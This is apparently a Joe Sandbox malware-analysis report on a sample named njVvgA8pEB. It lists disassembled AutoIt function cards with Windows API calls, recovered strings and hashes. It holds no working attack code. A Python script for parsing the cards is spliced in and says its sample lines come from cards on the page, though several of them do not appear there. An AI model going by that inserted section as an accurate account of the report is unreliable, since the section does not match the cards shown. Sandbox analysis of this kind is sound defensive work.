                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction ID: 144929ec21c14678dd699be10037f314b5d30283b226d6bdfc8dd17ed311baba
                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction Fuzzy Hash: 23C163322051930ADF2F463AC4B413FBAA15EA37B2B1B176DD4B2DF1D5EE60C925D620
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction ID: d452b8ee3f9e9628da9db4ea987d82742e40ae59b25e1c138817978d10691936
                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction Fuzzy Hash: 73C160322091930ADF6F463AC4B413EFAA15EA37B271B176DD4B3CB1D4EE20C965D620
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction ID: 8894a027b7a61c6f798ec4fd12eab2c6989f7d46591b405a78a92c6ec2ee4f2c
                                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction Fuzzy Hash: 6141C171D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction ID: f679c028e3744427a2d348385fe4e901a0641838dcb24f360326c55d42df4211
                                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction Fuzzy Hash: 73014278A11109EFCB44DF98C5909AEF7F5FF88310F2085A9DA19A7741E730AE41DB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction ID: b0319667ab6d795f3682c420220f3ea85f33eca3acb1307dbc0bd31715c8986b
                                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction Fuzzy Hash: 7A019278E11109EFCB44DF98C5909AEF7F5FB88310F2085A9D909A7301E730AE41DB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 0038785B
                                                                          • DeleteObject.GDI32(00000000), ref: 0038786D
                                                                          • DestroyWindow.USER32 ref: 0038787B
                                                                          • GetDesktopWindow.USER32 ref: 00387895
                                                                          • GetWindowRect.USER32(00000000), ref: 0038789C
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003879DD
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003879ED
                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387A35
                                                                          • GetClientRect.USER32(00000000,?), ref: 00387A41
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00387A7B
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387A9D
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AB0
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387ABB
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00387AC4
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AD3
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00387ADC
                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AE3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00387AEE
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387B00
                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003A2CAC,00000000), ref: 00387B16
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00387B26
                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00387B4C
                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00387B6B
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387B8D
                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387D7A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 2211948467-2373415609
                                                                          • Opcode ID: d3dfdfaa130db98f7e3a6ea964e3d50d1b6665be0e6a75a6eeb5a9d4e0262a75
                                                                          • Instruction ID: 61187f1ac47fa0a174a5e44a344a4fd0bf596d98591ea5ba11e5d8fbeb478d18
                                                                          • Opcode Fuzzy Hash: d3dfdfaa130db98f7e3a6ea964e3d50d1b6665be0e6a75a6eeb5a9d4e0262a75
                                                                          • Instruction Fuzzy Hash: 39026A71900205AFDB16EFA4DC89EAE7BB9EF48310F14855AF915EB2A0C771ED41CB60
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,0039F910), ref: 00393627
                                                                          • IsWindowVisible.USER32(?), ref: 0039364B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          • Opcode ID: 903dfc8833614f67e2c812c8e7426c141675e0d78ea216a17c6c3e6ba9f8693c
                                                                          • Instruction ID: e919af0f2be81435d847f8f6cecb624c5e5c3fd6c3f22bbb714bec312745919d
                                                                          • Opcode Fuzzy Hash: 903dfc8833614f67e2c812c8e7426c141675e0d78ea216a17c6c3e6ba9f8693c
                                                                          • Instruction Fuzzy Hash: CAD181B42083019FCF06EF10C4A5BAE77A5AF99354F154459F8869F3A2CB31EE4ACB41
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0039A630
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0039A661
                                                                          • GetSysColor.USER32(0000000F), ref: 0039A66D
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0039A687
                                                                          • SelectObject.GDI32(?,00000000), ref: 0039A696
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0039A6C1
                                                                          • GetSysColor.USER32(00000010), ref: 0039A6C9
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0039A6D0
                                                                          • FrameRect.USER32(?,?,00000000), ref: 0039A6DF
                                                                          • DeleteObject.GDI32(00000000), ref: 0039A6E6
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0039A731
                                                                          • FillRect.USER32(?,?,00000000), ref: 0039A763
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039A78E
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(00000012), ref: 0039A903
                                                                            • Part of subcall function 0039A8CA: SetTextColor.GDI32(?,?), ref: 0039A907
                                                                            • Part of subcall function 0039A8CA: GetSysColorBrush.USER32(0000000F), ref: 0039A91D
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(0000000F), ref: 0039A928
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(00000011), ref: 0039A945
                                                                            • Part of subcall function 0039A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039A953
                                                                            • Part of subcall function 0039A8CA: SelectObject.GDI32(?,00000000), ref: 0039A964
                                                                            • Part of subcall function 0039A8CA: SetBkColor.GDI32(?,00000000), ref: 0039A96D
                                                                            • Part of subcall function 0039A8CA: SelectObject.GDI32(?,?), ref: 0039A97A
                                                                            • Part of subcall function 0039A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0039A999
                                                                            • Part of subcall function 0039A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039A9B0
                                                                            • Part of subcall function 0039A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0039A9C5
                                                                            • Part of subcall function 0039A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039A9ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 3521893082-0
                                                                          • Opcode ID: 805327e6aae5a669ee8dbc29ba2aca40ee990cb4b8ed8df3285d94f13037b612
                                                                          • Instruction ID: 806f2b29da6ebfd5ad772705dbcc150db928c0565544720f263ed15a025ec59a
                                                                          • Opcode Fuzzy Hash: 805327e6aae5a669ee8dbc29ba2aca40ee990cb4b8ed8df3285d94f13037b612
                                                                          • Instruction Fuzzy Hash: 1A916E72008701EFDB129FA4DC48A5B7BADFF89321F114B2AF562D61A0D772D944CB92
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 00312CA2
                                                                          • DeleteObject.GDI32(00000000), ref: 00312CE8
                                                                          • DeleteObject.GDI32(00000000), ref: 00312CF3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00312CFE
                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00312D09
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0034C43B
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0034C474
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0034C89D
                                                                            • Part of subcall function 00311B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312036,?,00000000,?,?,?,?,003116CB,00000000,?), ref: 00311B9A
                                                                          • SendMessageW.USER32(?,00001053), ref: 0034C8DA
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0034C8F1
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034C907
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034C912
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          • Opcode ID: e49f572b39c12050524c5058cca9c2bfcb87b138cd6859bb698280bbac4022b7
                                                                          • Instruction ID: eb3201ecf27f83680845aa212de4dac91df1a5f21798893e372690cf094b8ed7
                                                                          • Opcode Fuzzy Hash: e49f572b39c12050524c5058cca9c2bfcb87b138cd6859bb698280bbac4022b7
                                                                          • Instruction Fuzzy Hash: 9A128C30611201EFDB56CF24C884BAABBE5FF09300F569569E995CF662CB31F891CB91
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 003874DE
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0038759D
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003875DB
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003875ED
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00387633
                                                                          • GetClientRect.USER32(00000000,?), ref: 0038763F
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00387683
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00387692
                                                                          • GetStockObject.GDI32(00000011), ref: 003876A2
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 003876A6
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003876B6
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003876BF
                                                                          • DeleteDC.GDI32(00000000), ref: 003876C8
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003876F4
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0038770B
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00387746
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0038775A
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0038776B
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0038779B
                                                                          • GetStockObject.GDI32(00000011), ref: 003877A6
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003877B1
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003877BB
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: d65f65548ea29b62a612f73139ad003c0a0e650fc0743d1ddfaeb4a04d795c08
                                                                          • Instruction ID: 7bdfb550317c73a07a7ef93ffb73ba9f0e8892eef8d3d1a064d05adf9474445c
                                                                          • Opcode Fuzzy Hash: d65f65548ea29b62a612f73139ad003c0a0e650fc0743d1ddfaeb4a04d795c08
                                                                          • Instruction Fuzzy Hash: 09A16FB1A40605BFEB15DBA4DC4AFAE7BADEB09710F108115FA14EB2E0C771AD00CB60
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037AD1E
                                                                          • GetDriveTypeW.KERNEL32(?,0039FAC0,?,\\.\,0039F910), ref: 0037ADFB
                                                                          • SetErrorMode.KERNEL32(00000000,0039FAC0,?,\\.\,0039F910), ref: 0037AF59
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: b49db4e4ea43c64ea8319249018e33f5db9ff9ee5979b7ac48491fa8b8656ec3
                                                                          • Instruction ID: 4dc3d6ffc07a8c60d92b4747869438676cb2adbdc816d6b0e8d4906203acbbdd
                                                                          • Opcode Fuzzy Hash: b49db4e4ea43c64ea8319249018e33f5db9ff9ee5979b7ac48491fa8b8656ec3
                                                                          • Instruction Fuzzy Hash: 6A5181B5649A05EA8B27EB10CD52EFD7364EB88700B21C45BE40BEB6D0DB359E41DB43
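Every function card on this page lists its call sites as bullets of a fixed shape: the resolved API and module, the argument tokens the disassembler could recover ("?" where it could not), the call-site address after "ref:", and sometimes a "Part of subcall function" prefix when Joe Sandbox folds a callee's calls into the caller's card. As an added example (not part of the Joe Sandbox report or its tooling; the function and type names are my own), the following Python parses those bullets into records so the effective import set and call-site addresses of a card can be checked programmatically. The sample lines are copied from the cards above and constructed into one input block.

```python
"""Parse the 'APIs' bullet lines of a Joe Sandbox function card.

Added example; not part of the Joe Sandbox report or tooling. Function and
type names below are my own choices.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One bullet per call site. Three shapes appear on the page:
#   • GetDriveTypeW.KERNEL32(?,0039FAC0,?,\\.\,0039F910), ref: 0037ADFB
#   • GetDesktopWindow.USER32 ref: 003949DF            (no argument list)
#   • Part of subcall function 00312344: GetCursorPos.USER32(?), ref: 00312357
_BULLET = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str                    # imported function, e.g. GetDriveTypeW
    module: str                 # module Joe Sandbox resolved it to, e.g. KERNEL32
    args: List[str]             # argument tokens as printed ('?' = not resolved)
    ref: int                    # call-site address inside the dumped image
    subcall_of: Optional[int]   # set when the call was folded in from a callee


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per bullet; non-matching lines (headers etc.) are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _BULLET.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def imports_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Module -> sorted, de-duplicated API names, i.e. the card's effective import set."""
    out: Dict[str, set] = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return {mod: sorted(names) for mod, names in sorted(out.items())}


def call_sites_outside(calls: List[ApiCall], base: int, end: int) -> List[int]:
    """Call-site addresses that do not fall in [base, end); flags bullets whose
    ref points outside the dumped image."""
    return [c.ref for c in calls if not base <= c.ref < end]


# Constructed sample: bullets copied from the function cards on this page.
SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0037AD1E
• GetDriveTypeW.KERNEL32(?,0039FAC0,?,\\.\,0039F910), ref: 0037ADFB
• SetErrorMode.KERNEL32(00000000,0039FAC0,?,\\.\,0039F910), ref: 0037AF59
• GetDesktopWindow.USER32 ref: 003949DF
• _memset.LIBCMT ref: 00398C44
  • Part of subcall function 00312344: GetCursorPos.USER32(?), ref: 00312357
  • Part of subcall function 00312344: GetAsyncKeyState.USER32(00000001), ref: 00312399
• SetTimer.USER32(00000000,00000000,00000028,00311256), ref: 003129FC
Strings
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for mod, names in imports_by_module(parsed).items():
        print(mod, names)
    # Image base 0x310000 comes from the 'Offset' field of the Memory Dump Source block;
    # the upper bound is an assumption chosen to cover the associated dumps listed there.
    print("outside image:", call_sites_outside(parsed, 0x310000, 0x3E0000))
```

The parser deliberately keeps argument tokens as printed rather than converting them to integers, because a token such as "AutoIt v3 GUI" or "\\.\" is a string the disassembler resolved, not a value, and the distinction is what tells you which call sites are worth looking at by hand.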
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-86951937
                                                                          • Opcode ID: 522a77efc806911c45778e3396a709c6daa65a637030bb8088e06740af55fccb
                                                                          • Instruction ID: 4dab4e79664f39aa9202b834c4e2cb0735ef246d4a7d1a10c7d9fbc6166b93b8
                                                                          • Opcode Fuzzy Hash: 522a77efc806911c45778e3396a709c6daa65a637030bb8088e06740af55fccb
                                                                          • Instruction Fuzzy Hash: D481E6B1640205ABCB1BAFA4DC83FFF77ACAF19700F044024F905AF192EB61DA95C661
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0039A903
                                                                          • SetTextColor.GDI32(?,?), ref: 0039A907
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0039A91D
                                                                          • GetSysColor.USER32(0000000F), ref: 0039A928
                                                                          • CreateSolidBrush.GDI32(?), ref: 0039A92D
                                                                          • GetSysColor.USER32(00000011), ref: 0039A945
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039A953
                                                                          • SelectObject.GDI32(?,00000000), ref: 0039A964
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0039A96D
                                                                          • SelectObject.GDI32(?,?), ref: 0039A97A
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0039A999
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039A9B0
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0039A9C5
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039A9ED
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0039AA14
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0039AA32
                                                                          • DrawFocusRect.USER32(?,?), ref: 0039AA3D
                                                                          • GetSysColor.USER32(00000011), ref: 0039AA4B
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0039AA53
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0039AA67
                                                                          • SelectObject.GDI32(?,0039A5FA), ref: 0039AA7E
                                                                          • DeleteObject.GDI32(?), ref: 0039AA89
                                                                          • SelectObject.GDI32(?,?), ref: 0039AA8F
                                                                          • DeleteObject.GDI32(?), ref: 0039AA94
                                                                          • SetTextColor.GDI32(?,?), ref: 0039AA9A
                                                                          • SetBkColor.GDI32(?,?), ref: 0039AAA4
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: 2ead0e4469928fb4b32973ec19b2a2590076e946e671f25fada6bc64c49f3751
                                                                          • Instruction ID: 6726cdc85b92ac0dc8b01b69b9e98afc2b159a83581ec178febe5973485723ee
                                                                          • Opcode Fuzzy Hash: 2ead0e4469928fb4b32973ec19b2a2590076e946e671f25fada6bc64c49f3751
                                                                          • Instruction Fuzzy Hash: B2511C71900618EFDF129FA4DC48EAE7BBDFB48320F114626F911EB2A1D7769940DB90
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00398AC1
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00398AD2
                                                                          • CharNextW.USER32(0000014E), ref: 00398B01
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00398B42
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00398B58
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00398B69
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00398B86
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00398BD8
